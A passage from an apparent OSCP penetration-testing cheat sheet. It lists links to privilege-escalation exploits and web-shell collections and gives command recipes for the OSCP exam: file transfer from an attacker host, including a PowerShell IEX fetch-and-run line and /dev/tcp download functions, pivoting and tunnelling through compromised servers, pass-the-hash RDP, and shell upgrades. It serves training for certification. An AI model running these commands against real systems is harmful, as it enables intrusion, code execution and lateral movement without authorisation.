https://github.com/ysanatomic/io_uring_LPE-CVE-2024-0582 |\n| CVE-2024-1086 | Use-After-Free Linux Kernel Netfilter nf_tables LPE | https://github.com/Notselwyn/CVE-2024-1086 |\n| CVE-2024-4577 | PHP-CGI Argument Injection Vulnerability RCE | https://github.com/watchtowrlabs/CVE-2024-4577 |\n| CVE-2024-30088 | Microsoft Windows LPE | https://github.com/tykawaii98/CVE-2024-30088 |\n| CVE-2024-49138 | Windows Common Log File System Driver LPE | https://github.com/MrAle98/CVE-2024-49138-POC |\n| n/a | dompdf RCE (0-day) | https://github.com/positive-security/dompdf-rce |\n| n/a | dompdf XSS to RCE (0-day) | https://positive.security/blog/dompdf-rce |\n| n/a | StorSvc LPE | https://github.com/blackarrowsec/redteam-research/tree/master/LPE%20via%20StorSvc |\n| n/a | ADCSCoercePotato | https://github.com/decoder-it/ADCSCoercePotato |\n| n/a | CoercedPotato LPE | https://github.com/Prepouce/CoercedPotato |\n| n/a | DCOMPotato LPE | https://github.com/zcgonvh/DCOMPotato |\n| n/a | DeadPotato LPE | https://github.com/lypd0/DeadPotato |\n| n/a | GenericPotato LPE | https://github.com/micahvandeusen/GenericPotato |\n| n/a | GodPotato LPE | https://github.com/BeichenDream/GodPotato |\n| n/a | JuicyPotato LPE | https://github.com/ohpe/juicy-potato |\n| n/a | Juice-PotatoNG LPE | https://github.com/antonioCoco/JuicyPotatoNG |\n| n/a | MultiPotato LPE | https://github.com/S3cur3Th1sSh1t/MultiPotato |\n| n/a | RemotePotato0 PE | https://github.com/antonioCoco/RemotePotato0 |\n| n/a | RoguePotato LPE | https://github.com/antonioCoco/RoguePotato |\n| n/a | RottenPotatoNG LPE | https://github.com/breenmachine/RottenPotatoNG |\n| n/a | RustPotato LPE | https://github.com/safedv/RustPotato |\n| n/a | SharpEfsPotato LPE | https://github.com/bugch3ck/SharpEfsPotato |\n| n/a | SigmaPotato LPE | https://github.com/tylerdotrar/SigmaPotato |\n| n/a | SweetPotato LPE | https://github.com/CCob/SweetPotato |\n| n/a | SweetPotato LPE | https://github.com/uknowsec/SweetPotato |\n| n/a | S4UTomato LPE | https://github.com/wh0amitz/S4UTomato |\n| n/a | PrintSpoofer LPE (1) | https://github.com/dievus/printspoofer |\n| n/a | PrintSpoofer LPE (2) | https://github.com/itm4n/PrintSpoofer |\n| n/a | Shocker Container Escape | https://github.com/gabrtv/shocker |\n| n/a | SystemNightmare PE | https://github.com/GossiTheDog/SystemNightmare |\n| n/a | NoFilter LPE | https://github.com/deepinstinct/NoFilter |\n| n/a | OfflineSAM LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM |\n| n/a | OfflineAddAdmin2 LPE | https://github.com/gtworek/PSBits/tree/master/OfflineSAM/OfflineAddAdmin2 |\n| n/a | Kernelhub | https://github.com/Ascotbe/Kernelhub |\n| n/a | Windows Exploits | https://github.com/SecWiki/windows-kernel-exploits |\n| n/a | Pre-compiled Windows Exploits | https://github.com/abatchy17/WindowsExploits |\n\n### Payloads\n\n| Name | URL |\n| --- | --- |\n| Payload Box | https://github.com/payloadbox |\n| PayloadsAllTheThings | https://github.com/swisskyrepo/PayloadsAllTheThings |\n| phpgcc | https://github.com/ambionics/phpggc |\n| PHP-Reverse-Shell | https://github.com/ivan-sincek/php-reverse-shell|\n| webshell | https://github.com/tennc/webshell |\n| Web-Shells | https://github.com/TheBinitGhimire/Web-Shells |\n\n### Wordlists\n\n| Name | URL |\n| --- | --- |\n| bopscrk | https://github.com/R3nt0n/bopscrk |\n| CeWL | https://github.com/digininja/cewl |\n| COOK | https://github.com/giteshnxtlvl/cook |\n| CUPP | https://github.com/Mebus/cupp |\n| Kerberos Username Enumeration | https://github.com/attackdebris/kerberos_enum_userlists |\n| SecLists | https://github.com/danielmiessler/SecLists |\n| Username Anarchy | https://github.com/urbanadventurer/username-anarchy |\n\n### Reporting\n\n| Name | URL |\n| --- | --- |\n| OSCP-Note-Vault | https://github.com/0xsyr0/OSCP-Note-Vault |\n| SysReptor | https://github.com/Syslifters/sysreptor |\n| SysReptor OffSec Reporting | https://github.com/Syslifters/OffSec-Reporting |\n| SysReptor Portal | https://oscp.sysreptor.com/oscp/signup/ |\n\n### Social Media Resources\n\n| Name | URL |\n| --- | --- |\n| OSCP Guide 01/12 – My Exam Experience | https://www.youtube.com/watch?v=9mrf-WyzkpE\u0026list=PLJnLaWkc9xRgOyupMhNiVFfgvxseWDH5x |\n| Rana Khalil | https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/ |\n| HackTricks | https://book.hacktricks.xyz/ |\n| HackTricks Local Windows Privilege Escalation Checklist | https://book.hacktricks.xyz/windows-hardening/checklist-windows-privilege-escalation |\n| Hacking Articles | https://www.hackingarticles.in/ |\n| Rednode Windows Privilege Escalation | https://rednode.com/privilege-escalation/windows-privilege-escalation-cheat-sheet/ |\n| OSCP Cheat Sheet by xsudoxx | https://github.com/xsudoxx/OSCP |\n| OSCP-Tricks-2023 by Rodolfo Marianocy | https://github.com/rodolfomarianocy/OSCP-Tricks-2023 |\n| IppSec (YouTube) | https://www.youtube.com/channel/UCa6eh7gCkpPo5XXUDfygQQA |\n| IppSec.rocks | https://ippsec.rocks/?# |\n| 0xdf | https://0xdf.gitlab.io/ |\n\n## Commands\n\n### Basics\n\n#### curl\n\n```c\ncurl -v http://\u003cDOMAIN\u003e                                                        // verbose output\ncurl -X POST http://\u003cDOMAIN\u003e                                                   // use POST method\ncurl -X PUT http://\u003cDOMAIN\u003e                                                    // use PUT method\ncurl --path-as-is http://\u003cDOMAIN\u003e/../../../../../../etc/passwd                 // use --path-as-is to handle /../ or /./ in the given URL\ncurl --proxy http://127.0.0.1:8080                                             // use proxy\ncurl -F myFile=@\u003cFILE\u003e http://\u003cRHOST\u003e                                          // file upload\ncurl${IFS}\u003cLHOST\u003e/\u003cFILE\u003e                                                       // Internal Field Separator (IFS) example\n```\n\n#### File Transfer\n\n##### Certutil\n\n```c\ncertutil -urlcache -split -f \"http://\u003cLHOST\u003e/\u003cFILE\u003e\" \u003cFILE\u003e\n```\n\n##### Netcat\n\n```c\nnc -lnvp \u003cLPORT\u003e \u003e \u003cFILE\u003e\nnc \u003cRHOST\u003e \u003cRPORT\u003e \u003c \u003cFILE\u003e\n```\n\n##### Impacket\n\n```c\nsudo impacket-smbserver \u003cSHARE\u003e ./\nsudo impacket-smbserver \u003cSHARE\u003e . -smb2support\ncopy * \\\\\u003cLHOST\u003e\\\u003cSHARE\u003e\n```\n\n##### PowerShell\n\n```c\niwr \u003cLHOST\u003e/\u003cFILE\u003e -o \u003cFILE\u003e\nIEX(IWR http://\u003cLHOST\u003e/\u003cFILE\u003e) -UseBasicParsing\npowershell -command Invoke-WebRequest -Uri http://\u003cLHOST\u003e:\u003cLPORT\u003e/\u003cFILE\u003e -Outfile C:\\\\temp\\\\\u003cFILE\u003e\n```\n\n##### Bash only\n\n###### wget version\n\nPaste directly to the shell.\n\n```c\nfunction __wget() {\n    : ${DEBUG:=0}\n    local URL=$1\n    local tag=\"Connection: close\"\n    local mark=0\n\n    if [ -z \"${URL}\" ]; then\n        printf \"Usage: %s \\\"URL\\\" [e.g.: %s http://www.google.com/]\" \\\n               \"${FUNCNAME[0]}\" \"${FUNCNAME[0]}\"\n        return 1;\n    fi\n    read proto server path \u003c\u003c\u003c$(echo ${URL//// })\n    DOC=/${path// //}\n    HOST=${server//:*}\n    PORT=${server//*:}\n    [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n    [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"HOST=$HOST\"\n    [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"PORT=$PORT\"\n    [[ $DEBUG -eq 1 ]] \u0026\u0026 echo \"DOC =$DOC\"\n\n    exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n    echo -en \"GET ${DOC} HTTP/1.1\\r\\nHost: ${HOST}\\r\\n${tag}\\r\\n\\r\\n\" \u003e\u00263\n    while read line; do\n        [[ $mark -eq 1 ]] \u0026\u0026 echo $line\n        if [[ \"${line}\" =~ \"${tag}\" ]]; then\n            mark=1\n        fi\n    done \u003c\u00263\n    exec 3\u003e\u0026-\n}\n```\n\n```c\n__wget http://\u003cLHOST\u003e/\u003cFILE\u003e\n```\n\n###### curl version\n\n```c\nfunction __curl() {\n  read proto server path \u003c\u003c\u003c$(echo ${1//// })\n  DOC=/${path// //}\n  HOST=${server//:*}\n  PORT=${server//*:}\n  [[ x\"${HOST}\" == x\"${PORT}\" ]] \u0026\u0026 PORT=80\n\n  exec 3\u003c\u003e/dev/tcp/${HOST}/$PORT\n  echo -en \"GET ${DOC} HTTP/1.0\\r\\nHost: ${HOST}\\r\\n\\r\\n\" \u003e\u00263\n  (while read line; do\n   [[ \"$line\" == $'\\r' ]] \u0026\u0026 break\n  done \u0026\u0026 cat) \u003c\u00263\n  exec 3\u003e\u0026-\n}\n```\n\n```c\n__curl http://\u003cLHOST\u003e/\u003cFILE\u003e \u003e \u003cOUTPUT_FILE\u003e\n```\n\n#### FTP\n\n```c\nftp \u003cRHOST\u003e\nftp -A \u003cRHOST\u003e\nwget -r ftp://anonymous:anonymous@\u003cRHOST\u003e\n```\n\n#### Kerberos\n\n```c\nsudo apt-get install krb5-kdc\n```\n\n##### Ticket Handling\n\n```c\nimpacket-getTGT \u003cDOMAIN\u003e/\u003cUSERNAME\u003e:'\u003cPASSWORD\u003e'\nexport KRB5CCNAME=\u003cFILE\u003e.ccache\nexport KRB5CCNAME='realpath \u003cFILE\u003e.ccache'\n```\n\n##### Kerberos related Files\n\n```c\n/etc/krb5.conf                   // kerberos configuration file location\nkinit \u003cUSERNAME\u003e                 // creating ticket request\nklist                            // show available kerberos tickets\nkdestroy                         // delete cached kerberos tickets\n.k5login                         // resides kerberos principals for login (place in home directory)\nkrb5.keytab                      // \"key table\" file for one or more principals\nkadmin                           // kerberos administration console\nadd_principal \u003cEMAIL\u003e            // add a new user to a keytab file\nksu                              // executes a command with kerberos authentication\nklist -k /etc/krb5.keytab        // lists keytab file\nkadmin -p kadmin/\u003cEMAIL\u003e -k -t /etc/krb5.keytab    // enables editing of the keytab file\n```\n\n##### Ticket Conversion\n\n###### kribi to ccache\n\n```c\nbase64 -d \u003cUSERNAME\u003e.kirbi.b64 \u003e \u003cUSERNAME\u003e.kirbi\nimpacket-ticketConverter \u003cUSERNAME\u003e.kirbi \u003cUSERNAME\u003e.ccache\nexport KRB5CCNAME=`realpath \u003cUSERNAME\u003e.ccache`\n```\n\n###### ccache to kirbi\n\n```c\nimpacket-ticketConverter \u003cUSERNAME\u003e.ccache \u003cUSERNAME\u003e.kirbi\nbase64 -w0 \u003cUSERNAME\u003e.kirbi \u003e \u003cUSERNAME\u003e.kirbi.base64\n```\n\n#### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n##### Download Proxy and Agent\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_agent_0.4.3_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.4.3/ligolo-ng_proxy_0.4.3_Linux_64bit.tar.gz\n```\n\n##### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n##### Setup Proxy on Attacker Machine\n\n```c\n./proxy -laddr \u003cLHOST\u003e:443 -selfcert\n```\n\n##### Setup Agent on Target Machine\n\n```c\n./agent -connect \u003cLHOST\u003e:443 -ignore-cert\n```\n\n##### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.1.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n```c\n[Agent : user@target] » listener_add --addr \u003cRHOST\u003e:\u003cLPORT\u003e --to \u003cLHOST\u003e:\u003cLPORT\u003e --tcp\n```\n\n#### Linux\n\n##### CentOS\n\n```c\ndoas -u \u003cUSERNAME\u003e /bin/sh\n```\n\n##### Environment Variables\n\n```c\nexport PATH=`pwd`:$PATH\n```\n\n##### gcc\n\n```c\ngcc (--static) -m32 -Wl,--hash-style=both exploit.c -o exploit\ni686-w64-mingw32-gcc -o main32.exe main.c\nx86_64-w64-mingw32-gcc -o main64.exe main.c\n```\n\n##### getfacl\n\n```c\ngetfacl \u003cLOCAL_DIRECTORY\u003e\n```\n\n##### iconv\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -t UTF-16LE | base64 -w 0\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\niconv -f ASCII -t UTF-16LE \u003cFILE\u003e.txt | base64 | tr -d \"\\n\"\n```\n\n##### vi\n\n```c\n:w !sudo tee %    # save file with elevated privileges without exiting\n```\n\n##### Windows Command Formatting\n\n```c\necho \"\u003cCOMMAND\u003e\" | iconv -f UTF-8 -t UTF-16LE | base64 -w0\n```\n\n#### Microsoft Windows\n\n##### dir\n\n```c\ndir /a\ndir /a:d\ndir /a:h\ndir flag* /s /p\ndir /s /b *.log\n```\n\n#### PHP Webserver\n\n```c\nsudo php -S 127.0.0.1:80\n```\n\n#### Ping\n\n```c\nping -c 1 \u003cRHOST\u003e\nping -n 1 \u003cRHOST\u003e\n```\n\n#### Port Forwarding\n\n##### Chisel\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n###### Reverse Pivot\n\n- LHOST \u003c APPLICATION SERVER\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:3000:127.0.0.1:3000\n```\n\n###### SOCKS5 / Proxychains Configuration\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\n./chisel server -p 9002 -reverse -v\n```\n\n###### APPLICATION SERVER\n\n```c\n./chisel client 192.168.50.10:9002 R:socks\n```\n\n##### Ligolo-ng\n\n\u003e https://github.com/nicocha30/ligolo-ng\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### Download Proxy and Agent\n\n\u003e https://github.com/nicocha30/ligolo-ng/releases\n\n```c\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_agent_0.6.2_Linux_64bit.tar.gz\nwget https://github.com/nicocha30/ligolo-ng/releases/download/v0.6.2/ligolo-ng_proxy_0.6.2_Linux_64bit.tar.gz\n```\n\n###### Prepare Tunnel Interface\n\n```c\nsudo ip tuntap add user $(whoami) mode tun ligolo\n```\n\n```c\nsudo ip link set ligolo up\n```\n\n###### Setup Proxy on LHOST\n\n```c\n./proxy -laddr 192.168.50.10:443 -selfcert\n```\n\n###### Setup Agent on APPLICATION SERVER\n\n```c\n./agent -connect 192.168.50.10:443 -ignore-cert\n```\n\n###### Configure Session\n\n```c\nligolo-ng » session\n```\n\n```c\n[Agent : user@target] » ifconfig\n```\n\n```c\nsudo ip r add 172.16.50.0/24 dev ligolo\n```\n\n```c\n[Agent : user@target] » start\n```\n\n###### Port Forwarding\n\n- LHOST \u003c APPLICATION SERVER \u003e DATABASE SERVER\n\n```c\n[Agent : user@target] » listener_add --addr 10.10.100.20:2345 --to 192.168.50.10:2345 --tcp\n```\n\n##### Socat\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER\n\n###### APPLICATION SERVER\n\n```c\nip a\nip r\nsocat -ddd TCP-LISTEN:2345,fork TCP:\u003cRHOST\u003e:5432\n```\n\n###### LHOST\n\n```c\npsql -h \u003cRHOST\u003e -p 2342 -U postgres\n```\n\n##### SSH Tunneling\n\n###### Local Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh \u003cUSERNAME\u003e@192.168.100.10\nip a\nip r\nfor i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445;\nssh -N -L 0.0.0.0:4455:172.16.50.10:445 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsmbclient -p 4455 //172.16.50.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n###### Dynamic Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\nssh -N -D 0.0.0.0:9999 \u003cUSERNAME\u003e@10.10.100.20\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 192.168.50.10 9999\nproxychains smbclient -p 4455 //172.16.50.10/\u003cSHARE\u003e -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n###### Remote Port Forwarding\n\n| System | IP address |\n| --- | --- |\n| LHOST | 192.168.50.10 |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER | 10.10.100.20 |\n| WINDOWS HOST | 172.16.50.10 |\n\n- LHOST \u003c-\u003e FIREWALL \u003c-\u003e APPLICATION SERVER \u003e DATABASE SERVER \u003e WINDOWS HOST\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nsudo ss -tulpn\n```\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 127.0.0.1:2345:10.10.100.20:5432 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\npsql -h 127.0.0.1 -p 2345 -U postgres\n```\n\n###### Remote Dynamic Port Forwarding\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\npython3 -c 'import pty; pty.spawn(\"/bin/bash\")'\nssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nsudo ss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains nmap -vvv -sT --top-ports=20 -Pn -n 10.10.100.20\n```\n\n##### sshuttle\n\n| System             | IP address     |\n| ------------------ | -------------- |\n| LHOST              | 192.168.50.10  |\n| APPLICATION SERVER | 192.168.100.10 |\n| DATABASE SERVER    | 10.10.100.20   |\n| WINDOWS HOST       | 172.16.50.10   |\n\n- LHOST \u003e APPLICATION SERVER \u003e NETWORK\n\n###### APPLICATION SERVER\n\n```c\nsocat TCP-LISTEN:2222,fork TCP:10.10.100.20:22\n```\n\n###### LHOST\n\n```c\nsshuttle -r \u003cUSERNAME\u003e@192.168.100.10:2222 10.10.100.0/24 172.16.50.0/24\nsmbclient -L //172.16.50.10/ -U \u003cUSERNAME\u003e --password=\u003cPASSWORD\u003e\n```\n\n##### ssh.exe\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  |\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e NETWORK\n\n###### LHOST\n\n```c\nsudo systemctl start ssh\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nwhere ssh\nC:\\Windows\\System32\\OpenSSH\\ssh.exe\nC:\\Windows\\System32\\OpenSSH\u003e ssh -N -R 9998 \u003cUSERNAME\u003e@192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\ntail /etc/proxychains4.conf\nsocks5 127.0.0.1 9998\nproxychains psql -h 10.10.100.20 -U postgres\n```\n\n##### Plink\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  |\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER\n\n###### LHOST\n\n```c\nfind / -name plink.exe 2\u003e/dev/null\n/usr/share/windows-resources/binaries/plink.exe\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nplink.exe -ssh -l \u003cUSERNAME\u003e -pw \u003cPASSWORD\u003e -R 127.0.0.1:9833:127.0.0.1:3389 192.168.50.10\n```\n\n###### LHOST\n\n```c\nss -tulpn\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:127.0.0.1:9833\n```\n\n##### Netsh\n\n| System              | IP address     |\n| ------------------- | -------------- |\n| LHOST               | 192.168.50.10  |\n| APPLICATION SERVER  | 192.168.100.10 |\n| WINDOWS JUMP SERVER | 192.168.100.20 |\n| DATABASE SERVER     | 10.10.100.20   |\n| WINDOWS HOST        | 172.16.50.10   |\n\n- LHOST \u003c FIREWALL \u003c WINDOWS JUMP SERVER \u003e DATABASE SERVER\n\n###### LHOST\n\n```c\nxfreerdp /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /v:192.168.100.20\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.50.10 connectport=22 connectaddress=10.10.100.20\nnetstat -anp TCP | findstr \"2222\"\nnetsh interface portproxy show all\nnetsh advfirewall firewall add rule name=\"port_forward_ssh_2222\" protocol=TCP dir=in localip=192.168.50.10 localport=2222 action=allow\n```\n\n###### LHOST\n\n```c\nsudo nmap -sS 192.168.50.10 -Pn -n -p2222\nssh database_admin@192.168.50.10 -p2222\n```\n\n###### WINDOWS JUMP SERVER\n\n```c\nnetsh advfirewall firewall delete rule name=\"port_forward_ssh_2222\"\nnetsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.50.10\n```\n\n#### Python Webserver\n\n```c\nsudo python -m SimpleHTTPServer 80\nsudo python3 -m http.server 80\n```\n\n#### RDP\n\n```c\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /d:\u003cDOMAIN\u003e /cert-ignore\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /p:\u003cPASSWORD\u003e /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /u:\u003cUSERNAME\u003e /d:\u003cDOMAIN\u003e /pth:'\u003cHASH\u003e' /dynamic-resolution +clipboard\nxfreerdp /v:\u003cRHOST\u003e /dynamic-resolution +clipboard /tls-seclevel:0 -sec-nla\nrdesktop \u003cRHOST\u003e\n```\n\n#### showmount\n\n```c\n/usr/sbin/showmount -e \u003cRHOST\u003e\nsudo showmount -e \u003cRHOST\u003e\nchown root:root sid-shell; chmod +s sid-shell\n```\n\n#### SMB\n\n```c\nmount.cifs //\u003cRHOST\u003e/\u003cSHARE\u003e /mnt/remote\nguestmount --add '/\u003cMOUNTPOINT\u003e/\u003cDIRECTORY/FILE\u003e' --inspector --ro /mnt/\u003cMOUNT\u003e -v\n```\n\n#### smbclient\n\n```c\nsmbclient -L \\\\\u003cRHOST\u003e\\ -N\nsmbclient -L //\u003cRHOST\u003e/ -N\nsmbclient -L ////\u003cRHOST\u003e/ -N\nsmbclient -L //\u003cRHOST\u003e// -U \u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient -U \"\u003cUSERNAME\u003e\" -L \\\\\\\\\u003cRHOST\u003e\\\\\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e\nsmbclient //\u003cRHOST\u003e/\u003cSHARE\u003e -U \u003cUSERNAME\u003e\nsmbclient //\u003cRHOST\u003e/SYSVOL -U \u003cUSERNAME\u003e%\u003cPASSWORD\u003e\nsmbclient \"\\\\\\\\\u003cRHOST\u003e\\\u003cSHARE\u003e\"\nsmbclient \\\\\\\\\u003cRHOST\u003e\\\\\u003cSHARE\u003e -U '\u003cUSERNAME\u003e' --socket-options='TCP_NODELAY IPTOS_LOWDELAY SO_KEEPALIVE SO_RCVBUF=131072 SO_SNDBUF=131072' -t 40000\nsmbclient --no-pass //\u003cRHOST\u003e/\u003cSHARE\u003e\n```\n\n##### Download multiple files at once\n\n```c\nmask\"\"\nrecurse ON\nprompt OFF\nmget *\n```\n\n#### SSH\n\n##### Using outdated Algorithms\n\n```c\nssh user@\u003cRHOST\u003e -oKexAlgorithms=+diffie-hellman-group1-sha1\n```\n\n##### Fixing SSH Private Key\n\n```c\ndos2unix id_rsa\nvim --clean id_rsa\nchmod 600 id_rsa\n```\n\n```c\ndos2unix id_rsa; vim --clean -c 'wq' id_rsa; chmod 600 id_rsa\n```\n\n#### Time and Date\n\n##### Get the Server Time\n\n```c\nsudo nmap -sU -p 123 --script ntp-info \u003cRHOST\u003e\n```\n\n##### Stop virtualbox-guest-utils to stop syncing Time\n\n```c\nsudo /etc/init.d/virtualbox-guest-utils stop\n```\n\n##### Stop systemd-timesyncd to sync Time manually\n\n```c\nsudo systemctl stop systemd-timesyncd\n```\n\n##### Disable automatic Sync\n\n```c\nsudo systemctl disable --now chronyd\n```\n\n##### Options to set the Date and Time\n\n```c\nsudo net time -c \u003cRHOST\u003e\nsudo net time set -S \u003cRHOST\u003e\nsudo net time \\\\\u003cRHOST\u003e /set /y\nsudo ntpdate \u003cRHOST\u003e\nsudo ntpdate -s \u003cRHOST\u003e\nsudo ntpdate -b -u \u003cRHOST\u003e\nsudo timedatectl set-timezone UTC\nsudo timedatectl list-timezones\nsudo timedatectl set-timezone '\u003cCOUNTRY\u003e/\u003cCITY\u003e'\nsudo timedatectl set-time 15:58:30\nsudo timedatectl set-time '2015-11-20 16:14:50'\nsudo timedatectl set-local-rtc 1\n```\n\n##### Keep in Sync with a Server\n\n```c\nwhile [ 1 ]; do sudo ntpdate \u003cRHOST\u003e;done\n```\n\n#### Tmux\n\n```c\nctrl b + w    # show windows\nctrl + \"      # split window horizontal\nctrl + %      # split window vertical\nctrl + ,      # rename window\nctrl + {      # flip window\nctrl + }      # flip window\nctrl + spacebar    # switch pane layout\n```\n\nCopy \u0026 Paste\n```c\n:setw -g mode-keys vi\nctrl b + [\nspace\nenter\nctrl b + ]\n```\n\nSearch\n```c\nctrl b + [    # enter copy\nctrl + /      # enter search while within copy mode for vi mode\nn             # search next\nshift + n     # reverse search\n```\n\nLogging\n```c\nctrl b\nshift + P    # start / stop\n```\n\nSave Output\n```c\nctrl b + :\ncapture-pane -S -\nctrl b + :\nsave-buffer \u003cFILE\u003e.txt\n```\n\n#### Upgrading Shells\n\n```c\npython -c 'import pty;pty.spawn(\"/bin/bash\")'\npython3 -c 'import pty;pty.spawn(\"/bin/bash\")'\n\nctrl + z\nstty raw -echo\nfg\nEnter\nEnter\nexport XTERM=xterm\n```\n\nor\n\n```c\nCtrl + z\nstty -a\nstty raw -echo;fg\nEnter\nEnter\nstty rows 37 cols 123\nexport TERM=xterm-256color\nbash\n```\n\nAlternatively:\n\n```c\nscript -q /dev/null -c bash\n/usr/bin/script -qc /bin/bash /dev/null\n```\n\n### Oneliner\n\n```c\nstty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;\n```\n\n#### Fixing Staircase Effect\n\n```c\nenv reset\n```\n\nor\n\n```c\nstty onlcr\n```\n\n#### VirtualBox\n\n```c\nsudo pkill VBoxClient \u0026\u0026 VBoxClient --clipboard\n```\n\n#### virtualenv\n\n```c\nsudo apt-get install virtualenv\nvirtualenv -p python2.7 venv\n. venv/bin/activate\n```\n\n```c\npython.exe -m pip install virtualenv\npython.exe -m virtualenv venv\nvenv\\Scripts\\activate\n```\n\n### Information Gathering\n\n#### memcached\n\n\u003e  https://github.com/pd4d10/memcached-cli\n\n```c\nmemcrashed / 11211/UDP\n\nnpm install -g memcached-cli\nmemcached-cli \u003cUSERNAME\u003e:\u003cPASSWORD\u003e@\u003cRHOST\u003e:11211\necho -en \"\\x00\\x00\\x00\\x00\\x00\\x01\\x00\\x00stats\\r\\n\" | nc -q1 -u 127.0.0.1 11211\n\nSTAT pid 21357\nSTAT uptime 